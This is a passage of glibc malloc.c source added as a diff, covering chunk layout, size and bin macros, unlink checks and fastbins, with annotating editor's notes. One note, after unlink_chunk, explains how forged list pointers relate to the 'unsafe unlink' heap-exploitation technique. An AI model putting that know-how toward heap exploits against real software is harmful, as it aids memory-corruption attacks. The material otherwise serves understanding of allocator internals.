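+
+/* Editor's note: a hedged paraphrase (a sketch, not the literal glibc code)
+   of the sliding-threshold rule described above.  When an mmapped chunk is
+   freed and dynamic adjustment has not been disabled via mallopt, the
+   threshold is bumped to that chunk's size so later allocations of the same
+   size are served from the heap instead of mmap:
+
+     if (chunk_is_mmapped (p)
+         && !mp_.no_dyn_threshold
+         && chunksize (p) > mp_.mmap_threshold
+         && chunksize (p) <= DEFAULT_MMAP_THRESHOLD_MAX)
+       {
+         mp_.mmap_threshold = chunksize (p);          // grow mmap threshold
+         mp_.trim_threshold = 2 * mp_.mmap_threshold; // keep trimming in step
+       }
+*/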
+
+/*
+  M_MMAP_MAX is the maximum number of requests to simultaneously
+  service using mmap. This parameter exists because
+  some systems have a limited number of internal tables for
+  use by mmap, and using more than a few of them may degrade
+  performance.
+
+  The default is set to a value that serves only as a safeguard.
+  Setting to 0 disables use of mmap for servicing large requests.
+*/
+
+#define M_MMAP_MAX             -4
+
+#ifndef DEFAULT_MMAP_MAX
+#define DEFAULT_MMAP_MAX       (65536)
+#endif
+
+#include <malloc.h>
+
+#ifndef RETURN_ADDRESS
+#define RETURN_ADDRESS(X_) (NULL)
+#endif
+
+/* Forward declarations.  */
+struct malloc_chunk;
+typedef struct malloc_chunk* mchunkptr;
+
+/* Internal routines.  */
+
+static void*  _int_malloc(mstate, size_t);
+static void     _int_free(mstate, mchunkptr, int);
+static void*  _int_realloc(mstate, mchunkptr, INTERNAL_SIZE_T,
+			   INTERNAL_SIZE_T);
+static void*  _int_memalign(mstate, size_t, size_t);
+static void*  _mid_memalign(size_t, size_t, void *);
+
+static void malloc_printerr(const char *str) __attribute__ ((noreturn));
+
+static void* mem2mem_check(void *p, size_t sz);
+static void top_check(void);
+static void munmap_chunk(mchunkptr p);
+#if HAVE_MREMAP
+static mchunkptr mremap_chunk(mchunkptr p, size_t new_size);
+#endif
+
+static void*   malloc_check(size_t sz, const void *caller);
+static void      free_check(void* mem, const void *caller);
+static void*   realloc_check(void* oldmem, size_t bytes,
+			       const void *caller);
+static void*   memalign_check(size_t alignment, size_t bytes,
+				const void *caller);
+
+/* ------------------ MMAP support ------------------  */
+
+
+#include <fcntl.h>
+#include <sys/mman.h>
+
+#if !defined(MAP_ANONYMOUS) && defined(MAP_ANON)
+# define MAP_ANONYMOUS MAP_ANON
+#endif
+
+#ifndef MAP_NORESERVE
+# define MAP_NORESERVE 0
+#endif
+
+#define MMAP(addr, size, prot, flags) \
+ __mmap((addr), (size), (prot), (flags)|MAP_ANONYMOUS|MAP_PRIVATE, -1, 0)
+
+
+/*
+  -----------------------  Chunk representations -----------------------
+*/
+
+
+/*
+  This struct declaration is misleading (but accurate and necessary).
+  It declares a "view" into memory allowing access to necessary
+  fields at known offsets from a given base. See explanation below.
+*/
+
+struct malloc_chunk {
+
+  INTERNAL_SIZE_T      mchunk_prev_size;  /* Size of previous chunk (if free).  */
+  INTERNAL_SIZE_T      mchunk_size;       /* Size in bytes, including overhead. */
+
+  struct malloc_chunk* fd;         /* double links -- used only if free. */
+  struct malloc_chunk* bk;
+
+  /* Only used for large blocks: pointer to next larger size.  */
+  struct malloc_chunk* fd_nextsize; /* double links -- used only if free. */
+  struct malloc_chunk* bk_nextsize;
+};
+
+
+/*
+   malloc_chunk details:
+
+    (The following includes lightly edited explanations by Colin Plumb.)
+
+    Chunks of memory are maintained using a `boundary tag' method as
+    described in e.g., Knuth or Standish.  (See the paper by Paul
+    Wilson ftp://ftp.cs.utexas.edu/pub/garbage/allocsrv.ps for a
+    survey of such techniques.)  Sizes of free chunks are stored both
+    in the front of each chunk and at the end.  This makes
+    consolidating fragmented chunks into bigger chunks very fast.  The
+    size fields also hold bits representing whether chunks are free or
+    in use.
+
+    An allocated chunk looks like this:
+
+
+    chunk-> +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
+	    |             Size of previous chunk, if unallocated (P clear)  |
+	    +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
+	    |             Size of chunk, in bytes                     |A|M|P|
+      mem-> +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
+	    |             User data starts here...                          .
+	    .                                                               .
+	    .             (malloc_usable_size() bytes)                      .
+	    .                                                               |
+nextchunk-> +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
+	    |             (size of chunk, but used for application data)    |
+	    +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
+	    |             Size of next chunk, in bytes                |A|0|1|
+	    +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
+
+    Where "chunk" is the front of the chunk for the purpose of most of
+    the malloc code, but "mem" is the pointer that is returned to the
+    user.  "Nextchunk" is the beginning of the next contiguous chunk.
+
+    Chunks always begin on even word boundaries, so the mem portion
+    (which is returned to the user) is also on an even word boundary, and
+    thus at least double-word aligned.
+
+    Free chunks are stored in circular doubly-linked lists, and look like this:
+
+    chunk-> +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
+	    |             Size of previous chunk, if unallocated (P clear)  |
+	    +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
+    `head:' |             Size of chunk, in bytes                     |A|0|P|
+      mem-> +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
+	    |             Forward pointer to next chunk in list             |
+	    +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
+	    |             Back pointer to previous chunk in list            |
+	    +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
+	    |             Unused space (may be 0 bytes long)                .
+	    .                                                               .
+	    .                                                               |
+nextchunk-> +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
+    `foot:' |             Size of chunk, in bytes                           |
+	    +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
+	    |             Size of next chunk, in bytes                |A|0|0|
+	    +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
+
+    The P (PREV_INUSE) bit, stored in the unused low-order bit of the
+    chunk size (which is always a multiple of two words), is an in-use
+    bit for the *previous* chunk.  If that bit is *clear*, then the
+    word before the current chunk size contains the previous chunk
+    size, and can be used to find the front of the previous chunk.
+    The very first chunk allocated always has this bit set,
+    preventing access to non-existent (or non-owned) memory. If
+    prev_inuse is set for any given chunk, then you CANNOT determine
+    the size of the previous chunk, and might even get a memory
+    addressing fault when trying to do so.
+
+    The A (NON_MAIN_ARENA) bit is cleared for chunks on the initial,
+    main arena, described by the main_arena variable.  When additional
+    threads are spawned, each thread receives its own arena (up to a
+    configurable limit, after which arenas are reused for multiple
+    threads), and the chunks in these arenas have the A bit set.  To
+    find the arena for a chunk on such a non-main arena, heap_for_ptr
+    performs a bit mask operation and indirection through the ar_ptr
+    member of the per-heap header heap_info (see arena.c).
+
+    Note that the `foot' of the current chunk is actually represented
+    as the prev_size of the NEXT chunk. This makes it easier to
+    deal with alignments etc but can be very confusing when trying
+    to extend or adapt this code.
+
+    The three exceptions to all this are:
+
+     1. The special chunk `top' doesn't bother using the
+	trailing size field since there is no next contiguous chunk
+	that would have to index off it. After initialization, `top'
+	is forced to always exist.  If it would become less than
+	MINSIZE bytes long, it is replenished.
+
+     2. Chunks allocated via mmap, which have the second-lowest-order
+	bit M (IS_MMAPPED) set in their size fields.  Because they are
+	allocated one-by-one, each must contain its own trailing size
+	field.  If the M bit is set, the other bits are ignored
+	(because mmapped chunks are neither in an arena, nor adjacent
+	to a freed chunk).  The M bit is also used for chunks which
+	originally came from a dumped heap via malloc_set_state in
+	hooks.c.
+
+     3. Chunks in fastbins are treated as allocated chunks from the
+	point of view of the chunk allocator.  They are consolidated
+	with their neighbors only in bulk, in malloc_consolidate.
+*/
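+
+/* Editor's example -- illustrative only, assuming a 64-bit build where
+   SIZE_SZ == 8 and MALLOC_ALIGNMENT == 16.  For a pointer p returned by
+   malloc (24), the chunk header lies just below the user data:
+
+       size_t size_field = ((size_t *) p)[-1];   // typically 0x21
+
+   0x21 decodes as a 0x20-byte chunk with the P (PREV_INUSE) bit set and the
+   A and M bits clear, matching the diagrams above.  */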
+
+/*
+  ---------- Size and alignment checks and conversions ----------
+*/
+
+/* conversion from malloc headers to user pointers, and back */
+
+#define chunk2mem(p)   ((void*)((char*)(p) + 2*SIZE_SZ))
+#define mem2chunk(mem) ((mchunkptr)((char*)(mem) - 2*SIZE_SZ))
+
+/* The smallest possible chunk */
+#define MIN_CHUNK_SIZE        (offsetof(struct malloc_chunk, fd_nextsize))
+
+/* The smallest size we can malloc is an aligned minimal chunk */
+
+#define MINSIZE  \
+  (unsigned long)(((MIN_CHUNK_SIZE+MALLOC_ALIGN_MASK) & ~MALLOC_ALIGN_MASK))
+
+/* Check if m has acceptable alignment */
+
+#define aligned_OK(m)  (((unsigned long)(m) & MALLOC_ALIGN_MASK) == 0)
+
+#define misaligned_chunk(p) \
+  ((uintptr_t)(MALLOC_ALIGNMENT == 2 * SIZE_SZ ? (p) : chunk2mem (p)) \
+   & MALLOC_ALIGN_MASK)
+
+/* pad request bytes into a usable size -- internal version */
+
+#define request2size(req)                                         \
+  (((req) + SIZE_SZ + MALLOC_ALIGN_MASK < MINSIZE)  ?             \
+   MINSIZE :                                                      \
+   ((req) + SIZE_SZ + MALLOC_ALIGN_MASK) & ~MALLOC_ALIGN_MASK)
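+
+/* Editor's note -- worked examples, assuming SIZE_SZ == 8 and
+   MALLOC_ALIGNMENT == 16 (a typical 64-bit build):
+
+       request2size (0)   == MINSIZE == 0x20
+       request2size (24)  == (24 + 8 + 15) & ~15 == 0x20
+       request2size (25)  == (25 + 8 + 15) & ~15 == 0x30
+
+   i.e. requests are padded by SIZE_SZ for the size field, rounded up to the
+   alignment, and never made smaller than MINSIZE.  */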
+
+/* Check that REQ does not overflow when padded and aligned and that the
+   resulting value is below PTRDIFF_MAX.  On success, store the padded size
+   (or MINSIZE, if the padded value would be smaller) in *SZ and return true;
+   return false if the check fails.  */
+static inline bool
+checked_request2size (size_t req, size_t *sz) __nonnull (1)
+{
+  if (__glibc_unlikely (req > PTRDIFF_MAX))
+    return false;
+  *sz = request2size (req);
+  return true;
+}
+
+/*
+   --------------- Physical chunk operations ---------------
+ */
+
+
+/* size field is or'ed with PREV_INUSE when previous adjacent chunk in use */
+#define PREV_INUSE 0x1
+
+/* extract inuse bit of previous chunk */
+#define prev_inuse(p)       ((p)->mchunk_size & PREV_INUSE)
+
+
+/* size field is or'ed with IS_MMAPPED if the chunk was obtained with mmap() */
+#define IS_MMAPPED 0x2
+
+/* check for mmap()'ed chunk */
+#define chunk_is_mmapped(p) ((p)->mchunk_size & IS_MMAPPED)
+
+
+/* size field is or'ed with NON_MAIN_ARENA if the chunk was obtained
+   from a non-main arena.  This is only set immediately before handing
+   the chunk to the user, if necessary.  */
+#define NON_MAIN_ARENA 0x4
+
+/* Check for chunk from main arena.  */
+#define chunk_main_arena(p) (((p)->mchunk_size & NON_MAIN_ARENA) == 0)
+
+/* Mark a chunk as not being on the main arena.  */
+#define set_non_main_arena(p) ((p)->mchunk_size |= NON_MAIN_ARENA)
+
+
+/*
+   Bits to mask off when extracting size
+
+   Note: IS_MMAPPED is intentionally not masked off from size field in
+   macros for which mmapped chunks should never be seen. This should
+   cause helpful core dumps to occur if it is tried by accident by
+   people extending or adapting this malloc.
+ */
+#define SIZE_BITS (PREV_INUSE | IS_MMAPPED | NON_MAIN_ARENA)
+
+/* Get size, ignoring use bits */
+#define chunksize(p) (chunksize_nomask (p) & ~(SIZE_BITS))
+
+/* Like chunksize, but do not mask SIZE_BITS.  */
+#define chunksize_nomask(p)         ((p)->mchunk_size)
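+
+/* Editor's note -- decoding example, not part of the original source: a
+   mchunk_size field of 0x95 means chunksize (p) == 0x90 with PREV_INUSE and
+   NON_MAIN_ARENA set (0x90 | 0x4 | 0x1) and IS_MMAPPED clear.  */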
+
+/* Ptr to next physical malloc_chunk. */
+#define next_chunk(p) ((mchunkptr) (((char *) (p)) + chunksize (p)))
+
+/* Size of the chunk below P.  Only valid if !prev_inuse (P).  */
+#define prev_size(p) ((p)->mchunk_prev_size)
+
+/* Set the size of the chunk below P.  Only valid if !prev_inuse (P).  */
+#define set_prev_size(p, sz) ((p)->mchunk_prev_size = (sz))
+
+/* Ptr to previous physical malloc_chunk.  Only valid if !prev_inuse (P).  */
+#define prev_chunk(p) ((mchunkptr) (((char *) (p)) - prev_size (p)))
+
+/* Treat space at ptr + offset as a chunk */
+#define chunk_at_offset(p, s)  ((mchunkptr) (((char *) (p)) + (s)))
+
+/* extract p's inuse bit */
+#define inuse(p)							      \
+  ((((mchunkptr) (((char *) (p)) + chunksize (p)))->mchunk_size) & PREV_INUSE)
+
+/* set/clear chunk as being inuse without otherwise disturbing */
+#define set_inuse(p)							      \
+  ((mchunkptr) (((char *) (p)) + chunksize (p)))->mchunk_size |= PREV_INUSE
+
+#define clear_inuse(p)							      \
+  ((mchunkptr) (((char *) (p)) + chunksize (p)))->mchunk_size &= ~(PREV_INUSE)
+
+
+/* check/set/clear inuse bits in known places */
+#define inuse_bit_at_offset(p, s)					      \
+  (((mchunkptr) (((char *) (p)) + (s)))->mchunk_size & PREV_INUSE)
+
+#define set_inuse_bit_at_offset(p, s)					      \
+  (((mchunkptr) (((char *) (p)) + (s)))->mchunk_size |= PREV_INUSE)
+
+#define clear_inuse_bit_at_offset(p, s)					      \
+  (((mchunkptr) (((char *) (p)) + (s)))->mchunk_size &= ~(PREV_INUSE))
+
+
+/* Set size at head, without disturbing its use bit */
+#define set_head_size(p, s)  ((p)->mchunk_size = (((p)->mchunk_size & SIZE_BITS) | (s)))
+
+/* Set size/use field */
+#define set_head(p, s)       ((p)->mchunk_size = (s))
+
+/* Set size at footer (only when chunk is not in use) */
+#define set_foot(p, s)       (((mchunkptr) ((char *) (p) + (s)))->mchunk_prev_size = (s))
+
+
+#pragma GCC poison mchunk_size
+#pragma GCC poison mchunk_prev_size
+
+/*
+   -------------------- Internal data structures --------------------
+
+   All internal state is held in an instance of malloc_state defined
+   below. There are no other static variables, except in two optional
+   cases:
+ * If USE_MALLOC_LOCK is defined, the mALLOC_MUTEx declared above.
+ * If mmap doesn't support MAP_ANONYMOUS, a dummy file descriptor
+     for mmap.
+
+   Beware of lots of tricks that minimize the total bookkeeping space
+   requirements. The result is a little over 1K bytes (for 4-byte
+   pointers and size_t.)
+ */
+
+/*
+   Bins
+
+    An array of bin headers for free chunks. Each bin is doubly
+    linked.  The bins are approximately proportionally (log) spaced.
+    There are a lot of these bins (128). This may look excessive, but
+    works very well in practice.  Most bins hold sizes that are
+    unusual as malloc request sizes, but are more usual for fragments
+    and consolidated sets of chunks, which is what these bins hold, so
+    they can be found quickly.  All procedures maintain the invariant
+    that no consolidated chunk physically borders another one, so each
+    chunk in a list is known to be preceded and followed by either
+    inuse chunks or the ends of memory.
+
+    Chunks in bins are kept in size order, with ties going to the
+    approximately least recently used chunk. Ordering isn't needed
+    for the small bins, which all contain the same-sized chunks, but
+    facilitates best-fit allocation for larger chunks. These lists
+    are just sequential. Keeping them in order almost never requires
+    enough traversal to warrant using fancier ordered data
+    structures.
+
+    Chunks of the same size are linked with the most
+    recently freed at the front, and allocations are taken from the
+    back.  This results in LRU (FIFO) allocation order, which tends
+    to give each chunk an equal opportunity to be consolidated with
+    adjacent freed chunks, resulting in larger free chunks and less
+    fragmentation.
+
+    To simplify use in double-linked lists, each bin header acts
+    as a malloc_chunk. This avoids special-casing for headers.
+    But to conserve space and improve locality, we allocate
+    only the fd/bk pointers of bins, and then use repositioning tricks
+    to treat these as the fields of a malloc_chunk*.
+ */
+
+typedef struct malloc_chunk *mbinptr;
+
+/* addressing -- note that bin_at(0) does not exist */
+#define bin_at(m, i) \
+  (mbinptr) (((char *) &((m)->bins[((i) - 1) * 2]))			      \
+             - offsetof (struct malloc_chunk, fd))
+
+/* analog of ++bin */
+#define next_bin(b)  ((mbinptr) ((char *) (b) + (sizeof (mchunkptr) << 1)))
+
+/* Reminders about list directionality within bins */
+#define first(b)     ((b)->fd)
+#define last(b)      ((b)->bk)
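+
+/* Editor's note -- how the repositioning trick works, illustrative only:
+   bin_at (m, i) points far enough *before* m->bins[(i - 1) * 2] that the fd
+   and bk members of the resulting fake chunk land exactly on the two array
+   slots, i.e.
+
+       &bin_at (m, i)->fd == &m->bins[(i - 1) * 2]
+       &bin_at (m, i)->bk == &m->bins[(i - 1) * 2 + 1]
+
+   so each bin header costs only two pointers instead of a full chunk.  */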
+
+/*
+   Indexing
+
+    Bins for sizes < 512 bytes contain chunks of all the same size, spaced
+    8 bytes apart. Larger bins are approximately logarithmically spaced:
+
+    64 bins of size       8
+    32 bins of size      64
+    16 bins of size     512
+     8 bins of size    4096
+     4 bins of size   32768
+     2 bins of size  262144
+     1 bin  of size what's left
+
+    There is actually a little bit of slop in the numbers in bin_index
+    for the sake of speed. This makes no difference elsewhere.
+
+    The bins top out around 1MB because we expect to service large
+    requests via mmap.
+
+    Bin 0 does not exist.  Bin 1 is the unordered list; if that would be
+    a valid chunk size the small bins are bumped up one.
+ */
+
+#define NBINS             128
+#define NSMALLBINS         64
+#define SMALLBIN_WIDTH    MALLOC_ALIGNMENT
+#define SMALLBIN_CORRECTION (MALLOC_ALIGNMENT > 2 * SIZE_SZ)
+#define MIN_LARGE_SIZE    ((NSMALLBINS - SMALLBIN_CORRECTION) * SMALLBIN_WIDTH)
+
+#define in_smallbin_range(sz)  \
+  ((unsigned long) (sz) < (unsigned long) MIN_LARGE_SIZE)
+
+#define smallbin_index(sz) \
+  ((SMALLBIN_WIDTH == 16 ? (((unsigned) (sz)) >> 4) : (((unsigned) (sz)) >> 3))\
+   + SMALLBIN_CORRECTION)
+
+#define largebin_index_32(sz)                                                \
+  (((((unsigned long) (sz)) >> 6) <= 38) ?  56 + (((unsigned long) (sz)) >> 6) :\
+   ((((unsigned long) (sz)) >> 9) <= 20) ?  91 + (((unsigned long) (sz)) >> 9) :\
+   ((((unsigned long) (sz)) >> 12) <= 10) ? 110 + (((unsigned long) (sz)) >> 12) :\
+   ((((unsigned long) (sz)) >> 15) <= 4) ? 119 + (((unsigned long) (sz)) >> 15) :\
+   ((((unsigned long) (sz)) >> 18) <= 2) ? 124 + (((unsigned long) (sz)) >> 18) :\
+   126)
+
+#define largebin_index_32_big(sz)                                            \
+  (((((unsigned long) (sz)) >> 6) <= 45) ?  49 + (((unsigned long) (sz)) >> 6) :\
+   ((((unsigned long) (sz)) >> 9) <= 20) ?  91 + (((unsigned long) (sz)) >> 9) :\
+   ((((unsigned long) (sz)) >> 12) <= 10) ? 110 + (((unsigned long) (sz)) >> 12) :\
+   ((((unsigned long) (sz)) >> 15) <= 4) ? 119 + (((unsigned long) (sz)) >> 15) :\
+   ((((unsigned long) (sz)) >> 18) <= 2) ? 124 + (((unsigned long) (sz)) >> 18) :\
+   126)
+
+// XXX It remains to be seen whether it is good to keep the widths of
+// XXX the buckets the same or whether it should be scaled by a factor
+// XXX of two as well.
+#define largebin_index_64(sz)                                                \
+  (((((unsigned long) (sz)) >> 6) <= 48) ?  48 + (((unsigned long) (sz)) >> 6) :\
+   ((((unsigned long) (sz)) >> 9) <= 20) ?  91 + (((unsigned long) (sz)) >> 9) :\
+   ((((unsigned long) (sz)) >> 12) <= 10) ? 110 + (((unsigned long) (sz)) >> 12) :\
+   ((((unsigned long) (sz)) >> 15) <= 4) ? 119 + (((unsigned long) (sz)) >> 15) :\
+   ((((unsigned long) (sz)) >> 18) <= 2) ? 124 + (((unsigned long) (sz)) >> 18) :\
+   126)
+
+#define largebin_index(sz) \
+  (SIZE_SZ == 8 ? largebin_index_64 (sz)                                     \
+   : MALLOC_ALIGNMENT == 16 ? largebin_index_32_big (sz)                     \
+   : largebin_index_32 (sz))
+
+#define bin_index(sz) \
+  ((in_smallbin_range (sz)) ? smallbin_index (sz) : largebin_index (sz))
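+
+/* Editor's note -- index examples, assuming SIZE_SZ == 8 and
+   MALLOC_ALIGNMENT == 16, so SMALLBIN_WIDTH is 16 and MIN_LARGE_SIZE is 0x400:
+
+       bin_index (0x20)  == smallbin_index (0x20)     == 2
+       bin_index (0x3f0) == smallbin_index (0x3f0)    == 63
+       bin_index (0x400) == largebin_index_64 (0x400) == 48 + (0x400 >> 6) == 64
+       bin_index (0x440) == largebin_index_64 (0x440) == 48 + (0x440 >> 6) == 65
+
+   Bin 1 is the unsorted bin described below.  */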
+
+/* Take a chunk off a bin list.  */
+static void
+unlink_chunk (mstate av, mchunkptr p)
+{
+  if (chunksize (p) != prev_size (next_chunk (p)))
+    malloc_printerr ("corrupted size vs. prev_size");
+
+  mchunkptr fd = p->fd;
+  mchunkptr bk = p->bk;
+
+  if (__builtin_expect (fd->bk != p || bk->fd != p, 0))
+    malloc_printerr ("corrupted double-linked list");
+
+  fd->bk = bk;
+  bk->fd = fd;
+  if (!in_smallbin_range (chunksize_nomask (p)) && p->fd_nextsize != NULL)
+    {
+      if (p->fd_nextsize->bk_nextsize != p
+	  || p->bk_nextsize->fd_nextsize != p)
+	malloc_printerr ("corrupted double-linked list (not small)");
+
+      if (fd->fd_nextsize == NULL)
+	{
+	  if (p->fd_nextsize == p)
+	    fd->fd_nextsize = fd->bk_nextsize = fd;
+	  else
+	    {
+	      fd->fd_nextsize = p->fd_nextsize;
+	      fd->bk_nextsize = p->bk_nextsize;
+	      p->fd_nextsize->bk_nextsize = fd;
+	      p->bk_nextsize->fd_nextsize = fd;
+	    }
+	}
+      else
+	{
+	  p->fd_nextsize->bk_nextsize = p->bk_nextsize;
+	  p->bk_nextsize->fd_nextsize = p->fd_nextsize;
+	}
+    }
+}
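+
+/* Editor's note -- what the checks above enforce, illustrative only: before
+   a chunk P is taken off its bin, its list neighbours must still point back
+   at it,
+
+       P->fd->bk == P  &&  P->bk->fd == P
+
+   (plus the size-vs-prev_size match for the physically adjacent chunk).
+   Forged fd/bk values therefore only survive the unlink if each forged
+   pointer refers to memory that itself holds a pointer back to P, which is
+   the constraint behind the classic "unsafe unlink" technique.  */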
+
+/*
+   Unsorted chunks
+
+    All remainders from chunk splits, as well as all returned chunks,
+    are first placed in the "unsorted" bin. They are then placed
+    in regular bins after malloc gives them ONE chance to be used before
+    binning. So, basically, the unsorted_chunks list acts as a queue,
+    with chunks being placed on it in free (and malloc_consolidate),
+    and taken off (to be either used or placed in bins) in malloc.
+
+    The NON_MAIN_ARENA flag is never set for unsorted chunks, so it
+    does not have to be taken into account in size comparisons.
+ */
+
+/* The otherwise unindexable 1-bin is used to hold unsorted chunks. */
+#define unsorted_chunks(M)          (bin_at (M, 1))
+
+/*
+   Top
+
+    The top-most available chunk (i.e., the one bordering the end of
+    available memory) is treated specially. It is never included in
+    any bin, is used only if no other chunk is available, and is
+    released back to the system if it is very large (see
+    M_TRIM_THRESHOLD).  Because top initially
+    points to its own bin with initial zero size, thus forcing
+    extension on the first malloc request, we avoid having any special
+    code in malloc to check whether it even exists yet. But we still
+    need to do so when getting memory from system, so we make
+    initial_top treat the bin as a legal but unusable chunk during the
+    interval between initialization and the first call to
+    sysmalloc. (This is somewhat delicate, since it relies on
+    the 2 preceding words to be zero during this interval as well.)
+ */
+
+/* Conveniently, the unsorted bin can be used as dummy top on first call */
+#define initial_top(M)              (unsorted_chunks (M))
+
+/*
+   Binmap
+
+    To help compensate for the large number of bins, a one-level index
+    structure is used for bin-by-bin searching.  `binmap' is a
+    bitvector recording whether bins are definitely empty so they can
+    be skipped over during traversals.  The bits are NOT always
+    cleared as soon as bins are empty, but instead only
+    when they are noticed to be empty during traversal in malloc.
+ */
+
+/* Conservatively use 32 bits per map word, even on a 64-bit system */
+#define BINMAPSHIFT      5
+#define BITSPERMAP       (1U << BINMAPSHIFT)
+#define BINMAPSIZE       (NBINS / BITSPERMAP)
+
+#define idx2block(i)     ((i) >> BINMAPSHIFT)
+#define idx2bit(i)       ((1U << ((i) & ((1U << BINMAPSHIFT) - 1))))
+
+#define mark_bin(m, i)    ((m)->binmap[idx2block (i)] |= idx2bit (i))
+#define unmark_bin(m, i)  ((m)->binmap[idx2block (i)] &= ~(idx2bit (i)))
+#define get_binmap(m, i)  ((m)->binmap[idx2block (i)] & idx2bit (i))
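+
+/* Editor's note -- worked example, not part of the original source: for bin
+   65, idx2block (65) == 65 >> 5 == 2 and idx2bit (65) == 1 << (65 & 31) ==
+   0x2, so mark_bin (m, 65) sets bit 1 of m->binmap[2].  */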
+
+/*
+   Fastbins
+
+    An array of lists holding recently freed small chunks.  Fastbins
+    are not doubly linked.  It is faster to single-link them, and
+    since chunks are never removed from the middles of these lists,
+    double linking is not necessary. Also, unlike regular bins, they
+    are not even processed in FIFO order (they use faster LIFO) since
+    ordering doesn't much matter in the transient contexts in which
+    fastbins are normally used.
+
+    Chunks in fastbins keep their inuse bit set, so they cannot
+    be consolidated with other free chunks. malloc_consolidate
+    releases all chunks in fastbins and consolidates them with
+    other free chunks.
+ */
+
+typedef struct malloc_chunk *mfastbinptr;
+#define fastbin(ar_ptr, idx) ((ar_ptr)->fastbinsY[idx])
+
+/* offset 2 to use otherwise unindexable first 2 bins */
+#define fastbin_index(sz) \
+  ((((unsigned int) (sz)) >> (SIZE_SZ == 8 ? 4 : 3)) - 2)
+
+
+/* The maximum fastbin request size we support */
+#define MAX_FAST_SIZE     (80 * SIZE_SZ / 4)
+
+#define NFASTBINS  (fastbin_index (request2size (MAX_FAST_SIZE)) + 1)
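+
+/* Editor's note -- worked example, assuming SIZE_SZ == 8: MAX_FAST_SIZE is
+   80 * 8 / 4 == 160, request2size (160) == 0xb0, fastbin_index (0xb0) ==
+   (0xb0 >> 4) - 2 == 9, hence NFASTBINS == 10 and the smallest fastbin
+   (index 0) holds 0x20-byte chunks.  */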
+
+/*
+   FASTBIN_CONSOLIDATION_THRESHOLD is the size of a chunk in free()
+   that triggers automatic consolidation of possibly-surrounding
+   fastbin chunks. This is a heuristic, so the exact value should not
+   matter too much. It is defined at half the default trim threshold as a
+   compromise heuristic to only attempt consolidation if it is likely
+   to lead to trimming. However, it is not dynamically tunable, since
+   consolidation reduces fragmentation surrounding large chunks even
+   if trimming is not used.
+ */
+
+#define FASTBIN_CONSOLIDATION_THRESHOLD  (65536UL)
+
+/*
+   NONCONTIGUOUS_BIT indicates that MORECORE does not return contiguous
+   regions.  Otherwise, contiguity is exploited in merging together,
+   when possible, results from consecutive MORECORE calls.
+
+   The initial value comes from MORECORE_CONTIGUOUS, but is
+   changed dynamically if mmap is ever used as an sbrk substitute.
+ */
+
+#define NONCONTIGUOUS_BIT     (2U)
+
+#define contiguous(M)          (((M)->flags & NONCONTIGUOUS_BIT) == 0)
+#define noncontiguous(M)       (((M)->flags & NONCONTIGUOUS_BIT) != 0)
+#define set_noncontiguous(M)   ((M)->flags |= NONCONTIGUOUS_BIT)
+#define set_contiguous(M)      ((M)->flags &= ~NONCONTIGUOUS_BIT)
+
+/* Maximum size of memory handled in fastbins.  */
+static INTERNAL_SIZE_T global_max_fast;
+
+/*
+   Set value of max_fast.
+   Use impossibly small value if 0.
+   Precondition: there are no existing fastbin chunks in the main arena.
+   Since do_check_malloc_state () checks this, we call malloc_consolidate ()
+   before changing max_fast.  Note other arenas will leak their fast bin
+   entries if max_fast is reduced.
+ */
+
+#define set_max_fast(s) \
+  global_max_fast = (((s) == 0)						      \
+                     ? MIN_CHUNK_SIZE / 2 : ((s + SIZE_SZ) & ~MALLOC_ALIGN_MASK))
+
+static inline INTERNAL_SIZE_T
+get_max_fast (void)
+{
+  /* Tell the GCC optimizers that global_max_fast is never larger
+     than MAX_FAST_SIZE.  This avoids out-of-bounds array accesses in
+     _int_malloc after constant propagation of the size parameter.
+     (The code never executes because malloc preserves the
+     global_max_fast invariant, but the optimizers may not recognize
+     this.)  */
+  if (global_max_fast > MAX_FAST_SIZE)
+    __builtin_unreachable ();
+  return global_max_fast;
+}
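+
+/* Editor's note -- worked example, assuming a 64-bit build where
+   DEFAULT_MXFAST is 64 * SIZE_SZ / 4 == 128 (as in mainline glibc):
+   set_max_fast (128) stores (128 + 8) & ~15 == 0x80, so by default chunks of
+   up to 0x80 bytes are eligible for the fastbins.  */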
+
+/*
+   ----------- Internal state representation and initialization -----------
+ */
+
+/*
+   have_fastchunks indicates that there are probably some fastbin chunks.
+   It is set true on entering a chunk into any fastbin, and cleared early in
+   malloc_consolidate.  The value is approximate since it may be set when there
+   are no fastbin chunks, or it may be clear even if there are fastbin chunks
+   available.  Given its sole purpose is to reduce the number of redundant calls
+   to malloc_consolidate, it does not affect correctness.  As a result we can safely
+   use relaxed atomic accesses.
+ */
+
+
+struct malloc_state
+{
+  /* Serialize access.  */
+  __libc_lock_define (, mutex);
+
+  /* Flags (formerly in max_fast).  */
+  int flags;
+
+  /* Set if the fastbin chunks contain recently inserted free blocks.  */
+  /* Note this is a bool but not all targets support atomics on booleans.  */
+  int have_fastchunks;
+
+  /* Fastbins */
+  mfastbinptr fastbinsY[NFASTBINS];
+
